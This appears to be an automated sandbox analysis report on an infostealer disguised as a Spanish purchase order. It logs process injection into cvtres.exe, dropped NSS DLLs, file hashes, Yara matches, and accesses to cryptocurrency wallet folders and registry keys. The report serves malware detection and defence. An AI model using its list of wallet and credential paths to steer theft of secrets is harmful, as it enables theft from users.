Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\nssdbm3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41B000	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41D000	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 4760008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: C:\Users\user\AppData\Local\Temp\1C1DB9BC\nss3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: C:\Users\user\AppData\Local\Temp\1C1DB9BC\mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: C:\Users\user\AppData\Local\Temp\1C1DB9BC\vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: C:\Users\user\AppData\Local\Temp\1C1DB9BC\msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Queries volume information: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: Yara match	File source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cvtres.exe.7e35982.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cvtres.exe.7e3b8e3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cvtres.exe.7e414d2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.294332451.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.309870959.00000000081D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NUEVA ORDEN-MATSA 10-2022,.exe PID: 1504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 4128, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior

Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Exodus\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Exodus\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets\

ID:	715078
Product:	CloudBasic
Start time:	16:00:45
Start date:	03.10.2022
Sample:	NUEVA ORDEN-MATSA 10-2022,.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	5bb547610939ac07657f6216a28498cb
SHA1:	89eadfa478804f0a5798e26871ff45c4906349ee
SHA256:	3d70466e2cb7b2b051feb16750acb3b40af81f4595a0c0ffa865c13907820ca2
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NUEVA ORDEN-MATSA 10-2022,.exe.log	CSV text	DD8B7A943A5D834CEEAB90A6BBBF4781	2BED8D47DF1C0FF76B40811E5F11298BD2D06389	E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-console-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	502263C56F931DF8440D7FD2FA7B7C00	523A3D7C3F4491E67FC710575D8E23314DB2C1A2	94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-datetime-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	CB978304B79EF53962408C611DFB20F5	ECA42F7754FB0017E86D50D507674981F80BC0B9	90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-debug-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	88FF191FD8648099592ED28EE6C442A5	6A4F818B53606A5602C609EC343974C2103BC9CC	C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-errorhandling-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6D778E83F74A4C7FE4C077DC279F6867	F5D9CF848F79A57F690DA9841C209B4837C2E6C3	A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	94AE25C7A5497CA0BE6882A00644CA64	F7AC28BBC47E46485025A51EEB6C304B70CEE215	7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-2-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E2F648AE40D234A3892E1455B4DBBE05	D9D750E828B629CFB7B402A3442947545D8D781B	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l2-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E479444BDD4AE4577FD32314A68F5D28	77EDF9509A252E886D4DA388BF9C9294D95498EB	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-handle-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6DB54065B33861967B491DD1C8FD8595	ED0938BBC0E2A863859AAD64606B8FC4C69B810A	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-heap-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	2EA3901D7B50BF6071EC8732371B821C	E7BE926F0F7D842271F7EDC7A4989544F4477DA7	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-interlocked-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D97A1CB141C6806F0101A5ED2673A63D	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-libraryloader-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D0873E21721D04E20B6FFB038ACCF2F1	9E39E505D80D67B347B19A349A1532746C1F7F88	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-localization-l1-2-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	EFF11130BFE0D9C90C0026BF2FB219AE	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-memory-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D500D9E24F33933956DF0E26F087FD91	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-namedpipe-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6F6796D1278670CCE6E2D85199623E27	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processenvironment-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5F73A814936C8E7E4A2DFD68876143C8	D960016C4F553E461AFB5B06B039A15D2E76135E	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A2D7D7711F9C0E3E065B2929FF342666	A17B1F36E73B82EF9BFB831058F187535A550EB8	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-1.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D0289835D97D103BAD0DD7B9637538A1	8CEEBE1E9ABB0044808122557DE8AAB28AD14575	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-profile-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FEE0926AA1BF00F2BEC9DA5DB7B2DE56	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-rtlsupport-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FDBA0DB0A1652D86CD471EAA509E56EA	3197CB45787D47BAC80223E3E98851E48A122EFA	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-string-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	12CC7D8017023EF04EBDD28EF9558305	F859A66009D1CAAE88BF36B569B63E1FBDAE9493	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	71AF7ED2A72267AAAD8564524903CFF6	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-2-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	0D1AA99ED8069BA73CFD74B0FDDC7B3A	BA1F5384072DF8AF5743F81FD02C98773B5ED147	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-sysinfo-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	19A40AF040BD7ADD901AA967600259D9	05B6322979B0B67526AE5CD6E820596CBE7393E4	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-timezone-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	BABF80608FD68A09656871EC8597296C	33952578924B0376CA4AE6A10B8D4ED749D10688	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-util-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	0F079489ABD2B16751CEB7447512A70D	679DD712ED1C46FBD9BC8615598DA585D94D5D87	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-conio-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	6EA692F862BDEB446E649E4B2893E36F	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-convert-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	72E28C902CD947F9A3425B19AC5A64BD	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-environment-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	AC290DAD7CB4CA2D93516580452EDA1C	FA949453557D0049D723F9615E4F390010520EDA	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-filesystem-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	AEC2268601470050E62CB8066DD41A59	363ED259905442C4E3B89901BFD8A43B96BF25E4	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-heap-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	93D3DA06BF894F4FA21007BEE06B5E7D	1E47230A7EBCFAF643087A1929A385E0D554AD15	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-locale-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A2F2258C32E3BA9ABF9E9E38EF7DA8C9	116846CA871114B7C54148AB2D968F364DA6142F	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-math-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	8B0BA750E7B15300482CE6C961A932F0	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-multibyte-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	35FC66BD813D0F126883E695664E7B83	2FD63C18CC5DC4DEFC7EA82F421050E668F68548	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-private-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	9910A1BFDC41C5B39F6AF37F0A22AACD	47FA76778556F34A5E7910C816C78835109E4050	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-process-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	8D02DD4C29BD490E672D271700511371	F3035A756E2E963764912C6B432E74615AE07011	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-runtime-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	41A348F9BEDC8681FB30FA78E45EDB24	66E76C0574A549F293323DD6F863A8A5B54F3F9B	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-stdio-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FEFB98394CB9EF4368DA798DEAB00E21	316D86926B558C9F3F6133739C1A8477B9E60740	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-string-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	404604CD100A1E60DFDAF6ECF5BA14C0	58469835AB4B916927B3CABF54AEE4F380FF6748	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-time-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	849F2C3EBF1FCBA33D16153692D5810F	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-utility-l1-1-0.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	B52A0CA52C9C207874639B62B6082242	6FB845D6A82102FF74BD35F42A2844D8C450413B	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
C:\Users\user\AppData\Local\Temp\1C1DB9BC\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	343AA83574577727AABE537DCCFDEAFC	9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06	393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
C:\Users\user\AppData\Local\Temp\1C1DB9BC\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	9E682F1EB98A9D41468FC3E50F907635	85E0CECA36F657DDF6547AA0744F0855A27527EE	830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
C:\Users\user\AppData\Local\Temp\1C1DB9BC\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	109F0F02FD37C84BFC7508D4227D7ED5	EF7420141BB15AC334D3964082361A460BFDB975	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
C:\Users\user\AppData\Local\Temp\1C1DB9BC\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	556EA09421A0F74D31C4C0A89A70DC23	F739BA9B548EE64B13EB434A3130406D23F836E3	F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
C:\Users\user\AppData\Local\Temp\1C1DB9BC\nssdbm3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	569A7A65658A46F9412BDFA04F86E2B2	44CC0038E891AE73C43B61A71A46C97F98B1030D	541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
C:\Users\user\AppData\Local\Temp\1C1DB9BC\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	67827DB2380B5848166A411BAE9F0632	F68F1096C5A3F7B90824AA0F7B9DA372228363FF	9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
C:\Users\user\AppData\Local\Temp\1C1DB9BC\ucrtbase.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D6326267AE77655F312D2287903DB4D3	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
C:\Users\user\AppData\Local\Temp\1C1DB9BC\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	7587BF9CB4147022CD5681B015183046	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
C:\Users\user\AppData\Local\Temp\50760375990489576525014.tmp	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2	CF7758A2FF4A94A5D589DEBAED38F82E	D3380E70D0CAEB9AD78D14DD970EA480E08232B8	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F

Windows Analysis Report NUEVA ORDEN-MATSA 10-2022,.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
NUEVA ORDEN-MATSA 10-2022,.exe